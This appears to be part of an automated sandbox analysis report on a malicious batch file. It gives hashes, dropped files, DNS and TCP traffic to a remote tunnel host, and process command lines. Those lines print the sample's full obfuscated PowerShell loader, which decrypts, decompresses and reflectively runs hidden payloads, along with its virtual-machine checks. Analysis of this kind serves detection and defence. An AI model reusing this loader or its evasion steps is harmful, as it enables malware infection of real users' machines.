Preview:	p...... ....(........J..(.......2...........,............................... ..........O.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.q.v.p.s.X.K.Y.8.R.R.Q.e.o.7.4.f.f.H.U.x.c.%.3.D...

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.928333974030045
Encrypted:	false
SSDEEP:	6:kKqT/sElvXJty4/lXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:SYMjy4/zmxMiv8sFFKbpgal7BlwhZg
MD5:	854687C7DB6C7FA5C06125E196518567
SHA1:	9D1005A5D61EFE012EF69CCAC07C1627B0ACFAA7
SHA-256:	0E88ECE2C8A374AFAF8971C270659B9931236CC9260F9545716B7E947CADD28D
SHA-512:	7BFC54FCAB26786965FA7D83151EAA896340E002032009ABD41E19F4630AFD5F9B0E4082E994C69E6C737FA0F321077D250D36DA9EDD464CD059CE1D5FF48AF3
Malicious:	false
Preview:	p...... ....(........J..(.......2..........+......b..'....................b..'.. ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.431657893255811
Encrypted:	false
SSDEEP:	6:kKlPK8k38uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:gukPlE99Si1QyIeek
MD5:	5E911BF6B090DA5DACEEC2947760D240
SHA1:	9CA1DB41C8B1A037D0157CC4C0EE1BC48C191D18
SHA-256:	78B3C72467D6F8F512B786BB3A19FD95BFAC07BE041B241BA13D4512455EAFB0
SHA-512:	15A3CAFD7547146DFF0EEA0055A476E447E96BECAACD8014BF06E31BA2E7F1279AC461D5C1296E08F9ADD85DCC641A9E9D62EA3D60BDD276441E7BF7A5009905
Malicious:	false
Preview:	p...... .........Yn .J..(...............................................dK.L#... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2186), with CRLF line terminators
Category:	dropped
Size (bytes):	2376
Entropy (8bit):	5.706979995129201
Encrypted:	false
SSDEEP:	48:9JFHDRp3RQGRf9RxFB3AdB3YtnoT8IvBDoO4or5JWl1KXEVhvMo2U7A2UHdT2UUC:PFHDRp3iGX7FBeBotnoT8WBDZ4qWlPB+
MD5:	8AEC379B66959725291E9B57AA576817
SHA1:	16FFB8651E8D3546071AB52790EE1AD8756CC6D1
SHA-256:	1C2AA307AE33B7E5135A71AE04878621C0F2F2EF6909106F28FE92E94D2E70B0
SHA-512:	EC7D0271A6E1C47B38B17CB4041CB2A72EC257E039768D1C1DD00C51D847826DDD27BBE92F4E4BA6E8E170D293456016E41D1E7165FDE9CEF76361FF98822403
Malicious:	false
Preview:	Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function PChco($juOOu){.$nHZjS=[System.Security.Cryptography.Aes]::Create();.$nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI=');.$nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w==');.$ifjSd=$nHZjS.CreateDecryptor();.$kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length);.$ifjSd.Dispose();.$nHZjS.Dispose();.$kfQiQ;}function QsuOu($juOOu){.Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', '');.Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', '');.Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStr

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (3523), with CRLF line terminators
Entropy (8bit):	6.016918973410356
TrID:
File name:	NhoqAfkhHL.bat
File size:	7'301'955 bytes
MD5:	98f30844747b3b14f19b6127df1765dc
SHA1:	2441d2660c67e64784c729732553779b952a8296
SHA256:	c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750
SHA512:	55521bbf96e79678fab3ebfe364f3f87cc53080616f4ead5ef5129b52410fffa782c541aee2cf58486e5eb25efd3fe56ea6c7178d03fa48cd786ea53ef0c478e
SSDEEP:	49152:afRq7YF410Ckz3qmh8VhdBC6+2u49Gc54h/GD8pWlvdOPX7XM/nTrOslcFMB+Bs5:t
TLSH:	617633A0ABD83D8F0956863FE0DBBB3C17951F92089BB4DAC6D4314B4D5FB929903C16
File Content Preview:	@echo off..%CmQiIgrXupacUcKPqvVOFTdvyur%@%zACKdYngEFLgLAMGirTMKNXDBlKJjuJnPwyTNqZVPEkLKOcfhwngAFkLDZi%%oDXjVxrocSTRsYXfCmTMiFCMhDMjlMqNhhHlHbPmxOdoDvOCIeirfvJJ%e%kbsKhdpCfJk%%LyBwHpuBojMOkAgDYILyYjwZwBp%c%NLxLDlWGHUygphNbpEAGWMDwYMsBcCafZJOCLalYEAWekFiQw%

File Icon


Icon Hash:	9686878b929a9886

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 09:17:34.059844971 CET	49736	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:34.179090023 CET	19465	49736	147.185.221.24	192.168.2.5
Dec 9, 2024 09:17:34.179166079 CET	49736	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:34.204926014 CET	49736	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:34.324182987 CET	19465	49736	147.185.221.24	192.168.2.5
Dec 9, 2024 09:17:56.087608099 CET	19465	49736	147.185.221.24	192.168.2.5
Dec 9, 2024 09:17:56.087698936 CET	49736	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:56.094336033 CET	49736	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:56.213757992 CET	19465	49736	147.185.221.24	192.168.2.5
Dec 9, 2024 09:17:59.570748091 CET	49798	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:59.690073013 CET	19465	49798	147.185.221.24	192.168.2.5
Dec 9, 2024 09:17:59.690156937 CET	49798	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:59.690500975 CET	49798	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:17:59.809743881 CET	19465	49798	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:21.603784084 CET	19465	49798	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:21.609230995 CET	49798	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:21.609788895 CET	49798	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:21.729026079 CET	19465	49798	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:25.195575953 CET	49849	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:25.314979076 CET	19465	49849	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:25.317209005 CET	49849	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:25.317542076 CET	49849	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:25.436908007 CET	19465	49849	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:47.213227034 CET	19465	49849	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:47.213309050 CET	49849	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:51.651763916 CET	49849	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:51.771179914 CET	19465	49849	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:55.867499113 CET	49854	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:18:55.987103939 CET	19465	49854	147.185.221.24	192.168.2.5
Dec 9, 2024 09:18:55.987974882 CET	49854	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:19:01.819343090 CET	49854	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:19:01.938805103 CET	19465	49854	147.185.221.24	192.168.2.5
Dec 9, 2024 09:19:17.886059999 CET	19465	49854	147.185.221.24	192.168.2.5
Dec 9, 2024 09:19:17.887198925 CET	49854	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:19:17.887439966 CET	49854	19465	192.168.2.5	147.185.221.24
Dec 9, 2024 09:19:18.007253885 CET	19465	49854	147.185.221.24	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 09:17:33.782208920 CET	59284	53	192.168.2.5	1.1.1.1
Dec 9, 2024 09:17:34.052820921 CET	53	59284	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 09:17:33.782208920 CET	192.168.2.5	1.1.1.1	0x71fb	Standard query (0)	capacity-sg.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 09:17:17.433721066 CET	1.1.1.1	192.168.2.5	0xb5f2	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 9, 2024 09:17:17.433721066 CET	1.1.1.1	192.168.2.5	0xb5f2	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 9, 2024 09:17:20.911425114 CET	1.1.1.1	192.168.2.5	0xd623	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 09:17:20.911425114 CET	1.1.1.1	192.168.2.5	0xd623	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 9, 2024 09:17:33.503856897 CET	1.1.1.1	192.168.2.5	0x1cb2	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 09:17:33.503856897 CET	1.1.1.1	192.168.2.5	0x1cb2	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 9, 2024 09:17:34.052820921 CET	1.1.1.1	192.168.2.5	0x71fb	No error (0)	capacity-sg.gl.at.ply.gg		147.185.221.24	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	03:16:59
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" "
Imagebase:	0x7ff792220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:16:59
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:16:59
Start date:	09/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff68d690000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:16:59
Start date:	09/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Imagebase:	0x7ff698e50000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:17:00
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Imagebase:	0x7ff792220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:17:00
Start date:	09/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:17:09
Start date:	09/12/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}
Imagebase:	0x7ff669820000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:17:09
Start date:	09/12/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6156c0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:17:11
Start date:	09/12/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff654c90000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:17:11
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Imagebase:	0x7ff792220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:17:11
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:17:12
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	03:17:14
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:	0x7ff792220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	03:17:14
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	03:17:14
Start date:	09/12/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff79d4a0000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	03:17:14
Start date:	09/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff68d690000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:17:14
Start date:	09/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Imagebase:	0x7ff698e50000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:17:18
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	03:17:18
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	03:17:19
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	03:17:19
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	03:17:20
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	03:17:20
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	03:17:21
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	03:17:22
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	03:17:22
Start date:	09/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Imagebase:	0x7ff792220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:17:22
Start date:	09/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff6d64d0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: svchost.exePID: 1232, Parent PID: 5068

General

Target ID:	29
Start time:	03:17:24
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	03:17:24
